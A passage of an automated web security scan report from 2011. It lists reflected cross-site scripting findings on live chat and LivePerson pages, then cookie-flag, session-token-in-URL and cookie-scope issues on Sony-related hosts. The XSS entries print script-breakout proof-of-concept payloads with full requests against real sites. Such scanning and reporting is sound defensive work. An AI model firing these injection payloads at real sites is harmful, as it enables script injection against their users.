Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:07 GMT
Content-Length: 69

//alert('writeinfocapture65bd4<script>alert(1)</script>d76e4a52225');

2.5. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 723f4'%3balert(1)//3785ea87a8a was submitted in the vbrowser parameter. This input was echoed as 723f4';alert(1)//3785ea87a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other723f4'%3balert(1)//3785ea87a8a&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:10 GMT
Content-Length: 1044

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other723f4';alert(1)//3785ea87a8a" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.6. https://www.websitealive5.com/4405/operator/guest/gLogin_Server.asp [vbrowser parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gLogin_Server.asp

Issue detail

The value of the vbrowser request parameter is copied into a JavaScript rest-of-line comment. The payload 8354b%0aalert(1)//0ce0b71cff9 was submitted in the vbrowser parameter. This input was echoed as 8354b
alert(1)//0ce0b71cff9
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4405/operator/guest/gLogin_Server.asp?groupid=4405&action=writeinfocapture&ismobile=False&vbrowser=other8354b%0aalert(1)//0ce0b71cff9&skin_id=4621&infocapture_ids=&infocapture_values=&departmentid=5101 HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; ASPSESSIONIDAQSSAADD=LGJFONDBOCBFHBFFGEDMAIAF; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NOI DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:17:12 GMT
Content-Length: 1042

//alert('writeinfocapture');
   document.getElementById("infocapturecontent").innerHTML = '<div class="general_text" style="margin-top:5px;">Phone Number</div><input type="hidden" name="i1" value="125"
...[SNIP]...
<input type="text" class="general_textbox plus_text_other8354b
alert(1)//0ce0b71cff9
" id="i_text1" name="i_text1" onfocus="style.borderColor=\'#FF9900\'" onblur="style.borderColor=\'#cccccc\'" style="width:75%;" value = "" onKeyPress="return checkEnter(event)">
...[SNIP]...

2.7. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b41e5'-alert(1)-'1d0f52fc05b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Db41e5%27%2Dalert%281%29%2D%271d0f52fc05b; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=IPDHGDPDGMCLEBHCBIOHDNJH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=b41e5'-alert(1)-'1d0f52fc05b');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...

3.2. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


3.3. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


4. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://sales.liveperson.net/hc/71737897/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/71737897/?&visitor=16101514677756&msessionkey=4916265021794629949&site=71737897&cmd=mTagStartPage&lpCallId=641238012350-103325378382&protV=20&lpjson=1&page=http%3A//www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay%3FlangId%3D-1%26storeId%3D10151%26catalogId%3D10551&id=4900462531&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sonystyle-sales-general-english&activePlugin=none&cobrowse=true&PV%21unit=sonystyle-sales-general&PV%21visitorActive=1&SV%21language=english&title=Sony%20Store%20USA%20%7C%20Sony%20VAIO%AE%20Computers%20%7C%20Sony%20Consumer%20Electronics HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:58:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71737897=STANDALONE; path=/hc/71737897
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 23 Jun 2011 14:58:34 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"641238012350-103325378382","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

4.2. https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://servicesales.sel.sony.com
Path:   /ecom/accessories/web/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ecom/accessories/web/index.jsp HTTP/1.1
Host: servicesales.sel.sony.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:25 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001hzt8DTIMlpyDNOhXRLF_ba5:2TPPETS20Q; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: TSeca4d8=c2e2e546d60a79171a338a04613adb2bd67db16442c902964e03597d60ac0ec5c9f27c41; Path=/
Content-Length: 46207


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
   <title>Sony Parts and Accessories - Home</title>
   <meta http-equiv="
...[SNIP]...
<div class="order_icon"><a href='http://servicesales.sel.sony.com/ecom/accessories/web/trackOrder.do?operation=init&sessionId=hzt8DTIMlpyDNOhXRLF_ba5' target="_top"><img src="../graphics/site/order_status.jpg" border="0">
...[SNIP]...

4.3. https://www.websitealive5.com/4405/operator/guest/gDefault_v2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.websitealive5.com
Path:   /4405/operator/guest/gDefault_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /4405/operator/guest/gDefault_v2.asp?cframe=login&chattype=normal&groupid=4405&websiteid=150&departmentid=5101&sessionid_=370043&iniframe=&ppc_id=&autostart=&text2chat_info=&loginname=&loginnamelast=&loginemail=&loginphone=&infocapture_ids=&infocapture_values=&dl=http%3A%2F%2Fwww%2Eomnitechsupport%2Ecom%2Fabout%2Ephp&loginquestion= HTTP/1.1
Host: www.websitealive5.com
Connection: keep-alive
Referer: http://www.websitealive5.com/4405/rRouter.asp?groupid=4405&websiteid=150&departmentid=5101&dl=http%3A//www.omnitechsupport.com/about.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQSSBBCC=EHNLLBEBNIJJJKCLOEIKFCHO; BIGipServerWebSiteAlive_WWW-1=355578890.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, private,private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 23 Jun 2011 15:16:28 GMT
Content-Length: 15042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 8 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

5.2. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 23 Jun 2011 15:19:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQQCBBCCB=EODHGDPDEDEKKABJJNKILEHB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

5.3. http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597E[CE]; Expires=Tue, 21 Jun 2016 15:19:26 GMT; Domain=.2o7.net; Path=/
Location: http://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:26 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


5.4. https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonyelectronicssupportus.112.2o7.net
Path:   /b/ss/esupport-sony-dev/1/H.10--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/esupport-sony-dev/1/H.10--NS/0 HTTP/1.1
Host: sonyelectronicssupportus.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tbdaax7Ecex3Cbx7Ex7Fhx3Cutg=[CS]v4|0-0|4E03597F[CE]; Expires=Tue, 21 Jun 2016 15:19:27 GMT; Domain=.2o7.net; Path=/
Location: https://sonyelectronicssupportus.112.2o7.net/b/ss/esupport-sony-dev/1/H.10--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:27 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www495
Content-Length: 0
Content-Type: text/plain
Connection: close


5.5. https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sonysscom.112.2o7.net
Path:   /b/ss/sonysscom/1/H.8--NS/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/sonysscom/1/H.8--NS/0 HTTP/1.1
Host: sonysscom.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 15:19:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_zfgpzzjfd=[CS]v4|0-0|4E035980[CE]; Expires=Tue, 21 Jun 2016 15:19:28 GMT; Domain=.2o7.net; Path=/
Location: https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 22 Jun 2011 15:19:28 GMT
Last-Modified: Fri, 24 Jun 2011 15:19:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain
Connection: close


5.6. http://www.facebook.com/sonyelectronics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

5.7. http://www.flickr.com/groups/sonycameraclub  previous  next

Summary

Severity:   Information
